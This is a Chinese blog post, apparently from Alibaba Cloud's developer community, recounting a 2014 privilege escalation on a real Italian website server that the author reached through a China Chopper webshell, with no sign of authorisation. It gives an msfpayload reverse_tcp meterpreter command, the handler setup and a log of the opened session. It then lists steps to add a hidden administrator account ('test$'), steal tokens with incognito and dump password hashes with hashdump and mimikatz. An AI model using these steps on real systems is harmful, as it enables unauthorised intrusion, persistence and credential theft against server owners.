AI 助理
备案控制台
开发者社区 安全 文章 正文

记一次提权添加管理员实战案例

2023-09-29 61
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: 记一次提权添加管理员实战案例

0x01 前言

这个案例记录的是笔者2014年测试的一台服务器,闲着无聊之时在“中国菜刀”上找了一个以前的意大利站点做测试,这是很久以前的站了,都忘了有没有提权过了,试了下刚放出来的CVE-2014-4113都失败了,执行后无回显。


0x02 实战提权过程

首先我们先利用Metasploit的msfpayload命令生成一个普通的exe载荷上传至目标可读写目录中,配置好监听模块的相关参数,然后执行即可得到一个普通权限的会话。

    msfpayload windows/meterpreter/reverse_tcp lhost=1*3.2*1.*7.*7 lport=7777 X > /media/sf_系统学习/test.exe


    注:这里提一下为什么我们生成载荷时填的公网IP,而在配置监听模块时填的内网IP?那是因为当时是用本地局域网的kali进行测试的,最后是用路由器的端口映射功能将Kali的7777端口映射出来的。

      msf > use exploit/multi/handler 
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.4
msf exploit(handler) > set LPORT 7777
msf exploit(handler) > exploit 
[*] Started reverse handler on 192.168.1.4:7777 
[*] Starting the payload handler...
[*] Sending stage (770048 bytes) to 6*.7*.2*3.5*
[*] Meterpreter session 6 opened (192.168.1.4:7777 -> 6*.7*.2*3.5*:2446) at 2014-10-26


      习惯性的先执行了下getsystem命令居然成功将权限提升至SYSTEM,接着测试了下其它命令,当我们测试到shell命令时发现虽然已经进入到命令终端了,但是依旧为zorro\iwam_server普通权限。


      通过Google搜索看到Hak5安全社区中有人也提到过类似问题,解决办法大概意思就是说我们需要先将当前会话的进程迁移至Admin/System权限运行的进程上去,然后才能有权限添加管理员用户。

      Before meterpreter will drop into a shell with system privileges, it first has to migrate to a process with system privs. If you drop directly in like I was doing you'll have whatever privs the browser was running with. 
After the migration to a process with sys/admin privs, if you drop into a shell you'll have sys privs.


      目前因权限不够而暂时无法直接在命令终端添加管理员用户,那么还有什么方法可以添加管理员用户或者得到目标管理员的密码呢?这里笔者另外提供几种思路,仅供参考,1-2断开会话,3-5已成功!


      (1) run getgui -u test$ -p 123456(添加管理员)


      (2) migrate 3760(迁移到system运行的进程)


      (3) use incognito(加载incognito扩展)


      (4) hashdump(获取系统hash值并破解)


      (5) 其它方法,如:mimikatz扩展、smart_hashdump模块等方法


      文章标签:
      Shell
      数据安全/隐私保护
      网络架构
      安全
      潇湘信安
      目录
      相关文章
      猫头虎
      |
      Kubernetes Cloud Native Linux
      10个Linux命令,每个管理员都应该知道
      10个Linux命令,每个管理员都应该知道
      猫头虎
      63 1
      潇湘信安
      |
      安全 PHP Apache
      记一次匈牙利服务器提权案例
      记一次匈牙利服务器提权案例
      潇湘信安
      85 0
      潇湘信安
      |
      开发框架 安全 .NET
      星外虚拟主机提权实战案例
      星外虚拟主机提权实战案例
      潇湘信安
      190 0
      潇湘信安
      |
      开发框架 安全 .NET
      VHAdmin虚拟主机提权实战案例
      VHAdmin虚拟主机提权实战案例
      潇湘信安
      102 0
      阿甘兄
      |
      数据安全/隐私保护
      30Linux - 用户/权限管理(查看登录用户:who)
      30Linux - 用户/权限管理(查看登录用户:who)
      阿甘兄
      27 1
      潇湘信安
      |
      安全 关系型数据库 MySQL
      黑吃黑Getshell到提权实战案例
      黑吃黑Getshell到提权实战案例
      潇湘信安
      324 0
      漏刻有时
      |
      API 数据安全/隐私保护
      漏刻有时忘记超级管理员密码的解决方案:通过API接口设置超级管理员
      漏刻有时忘记超级管理员密码的解决方案:通过API接口设置超级管理员
      漏刻有时
      82 0
      Zacarx
      |
      安全 JavaScript Unix
      【总结】提权基础与五种姿势
      本次总结主要是讲解什么是提权以及常见的五个linux提权漏洞,适合初学者进阶。
      Zacarx
      198 0
      我是一棵卷心菜
      |
      Linux 数据安全/隐私保护
      【Linux实操篇二】用户管理是什么?该如何进行用户管理(用户、组、密码等介绍)?(二)
      【Linux实操篇二】用户管理是什么?该如何进行用户管理(用户、组、密码等介绍)?(二)
      我是一棵卷心菜
      4136 3
      【Linux实操篇二】用户管理是什么?该如何进行用户管理(用户、组、密码等介绍)?(二)
      阿Q说代码
      |
      存储 JSON 安全
      实际项目教学:身份/权限验证
      实际项目教学:身份/权限验证
      阿Q说代码
      196 0
      实际项目教学:身份/权限验证